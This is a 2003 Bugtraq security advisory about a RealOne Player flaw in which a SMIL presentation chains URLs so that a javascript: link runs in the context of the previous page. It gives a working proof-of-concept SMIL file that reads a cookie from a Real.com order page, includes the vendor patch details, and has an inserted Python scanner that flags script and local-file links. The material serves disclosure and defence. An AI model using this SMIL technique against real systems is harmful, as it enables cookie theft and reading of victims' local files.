RealOne Player Allows Cross Zone and Domain Access

From: DigitalPranksters (secteam_at_digitalpranksters.com)
Date: 08/27/03

    Date: Wed, 27 Aug 2003 12:44:11 -0500 (EST)
    To: bugtraq@securityfocus.com

    DigitalPranksters Security Advisory
    http://www.DigitalPranksters.com

    RealOne Player Allows Cross Zone and Domain Access

    Risk: High

    Product: RealOne Player (English only), RealOne Player v2 for Windows (all
    languages), and RealOne Enterprise Desktop (all versions, standalone and
    as configured by RealOne Desktop Manager).

    Product URL: http://www.real.com/realoneplayer.html

    Vendor Contacted: July 1, 2003

    Vendor Released Patch: August 19, 2003

    DigitalPranksters Public Advisory Released: August 27, 2003

    Found by: KrazySnake (krazysnake@digitalpranksters.com)

    Problem:
    Using a SMIL presentation, an attacker can instruct the RealOne player to
    load a series of URLs. If the attacker specifies a scripting protocol as
    the URL, the script executes in the context of the previous URL. This
    gives the attacker access to everything the previous URL had access to.
    For example, an attacker could load a file on the local machine (C: drive)
    through the SMIL and then load script into the "my computer" zone to read
    content from the local hard disk. It also allows the attacker to script web
    sites and steal cookies.
    We feel this is a high risk because there is no prompt before opening a
    SMIL file. This allows the attacker to open the maliciously created file
    without the victim's intent. We have identified several potential attack
    vectors. These include linking to the SMIL over HTTP through link (A
    HREF="malicious.smil"), javascript (document.location="malicious.smil"),
    and email attachments.

    Proof of concept:
    We have created a SMIL file that will read the cookie from
    https://order.real.com/pt/order.html. The cookie will be read 9 seconds
    after the audio has begun.

    Source Code:
    <smil xmlns="http://www.w3.org/2001/SMIL20/Language"
          xmlns:rn="http://features.real.com/2001/SMIL20/Extensions">
      <head>
        <meta name="title" content="DigitalPranksters.com Proof of Concept"/>
        <meta name="author" content="DigitalPranksters.com"/>
        <meta name="copyright" content="(c)2003 DigitalPranksters.com"/>
      </head>
      <body>
        <audio src="http://radio.real.com/RGX/def.def...RGX/www.smgradio.com/core/audio/real/live.ram?service=vr">
          <area href="https://order.real.com/pt/order.html" begin="1s"
                external="true" actuate="onLoad" sourcePlaystate="play"
                rn:sendTo="_rpcontextwin">
            <rn:param name="width" value="10"/>
            <rn:param name="height" value="10"/>
          </area>
          <area href="javascript:alert('Hi there! I\'m a digital prankster. I
                just read your cookie from ' + document.domain + ' over the ' +
                location.protocol + '// protocol.\n\nThe value was:\n' + document.cookie +
                '\n\nHave a nice day.')" begin="9s" external="true" actuate="onLoad"
                sourcePlaystate="play" rn:sendTo="_rpcontextwin"/>
        </audio>
      </body>
    </smil>
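    As an added defensive check (this is not part of the advisory or of RealNetworks' fix), the following Python scanner parses a SMIL presentation and flags every link whose target uses a scripting or local-file scheme, the two ingredients of the chain described in the Problem section and shown in the proof of concept. The whitespace normalization and the drive-letter heuristic are this example's own assumptions, and the sample presentation is constructed.

```python
import xml.etree.ElementTree as ET
from urllib.parse import urlsplit

# Schemes that RealOne's embedded browser executes as script, in the context
# of whatever the previous link in the presentation loaded.
SCRIPT_SCHEMES = {"javascript", "jscript", "vbscript", "livescript"}
# SMIL elements that carry a navigable href (SMIL 2.0 a/area, SMIL 1.0 anchor).
LINK_TAGS = {"a", "area", "anchor"}

def classify_href(href):
    """Return 'script', 'local' or None for one link target."""
    # Drop embedded whitespace first: browsers of that era tolerated stray
    # spaces or tabs around a scheme (assumption, conservative on purpose).
    compact = "".join(href.split())
    scheme = urlsplit(compact).scheme.lower()
    if scheme in SCRIPT_SCHEMES:
        return "script"
    # file: URLs and bare drive letters (urlsplit reports "C:\\x" as scheme
    # "c") both land in the "my computer" zone.
    if scheme == "file" or len(scheme) == 1:
        return "local"
    return None

def scan_smil(text):
    """Return (tag, href, kind) for every link whose target is a scripting or
    local-file URL. Raises ET.ParseError on malformed XML."""
    root = ET.fromstring(text)
    findings = []
    for elem in root.iter():
        tag = elem.tag.rsplit("}", 1)[-1]  # drop the "{namespace}" prefix
        href = elem.get("href")
        if tag in LINK_TAGS and href is not None:
            kind = classify_href(href)
            if kind:
                findings.append((tag, href.strip(), kind))
    return findings

# Constructed sample (not the advisory's PoC): a benign link, then a local
# file link followed by a script link, the sequence the advisory describes.
SAMPLE_SMIL = """<smil xmlns="http://www.w3.org/2001/SMIL20/Language"
  xmlns:rn="http://features.real.com/2001/SMIL20/Extensions">
 <body>
  <audio src="rtsp://example.invalid/live.rm">
   <area href="http://example.invalid/notes.html" begin="1s" external="true"/>
   <area href="file:///C:/" begin="3s" external="true" rn:sendTo="_rpcontextwin"/>
   <area href=" JavaScript:void(0)" begin="5s" external="true" rn:sendTo="_rpcontextwin"/>
  </audio>
 </body>
</smil>"""
```

Any non-empty result from scan_smil is reason to refuse the presentation at a mail gateway or proxy, since a media clip has no legitimate use for script: or file: links.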

    Resolution:
    RealNetworks released a security update to address this issue. The
    security update and details of this update from RealNetworks are available
    from
    http://service.real.com/help/faq/security/securityupdate_august2003.html.

    Greetings:
    Harmo and HTMLBCat.
    Thanks to RealNetworks for fixing this issue.

    Disclaimer:
    Standard disclaimer applies. The opinions expressed in this advisory are
    our own and not of any company. The information within this advisory may
    change without notice. Use of this information constitutes acceptance for
    use in an AS IS condition. There are no warranties with regard to this
    information. In no event shall the author be liable for any damages
    whatsoever arising out of or in connection with the use or spread of this
    information. Any use of this information is at the user's own risk.

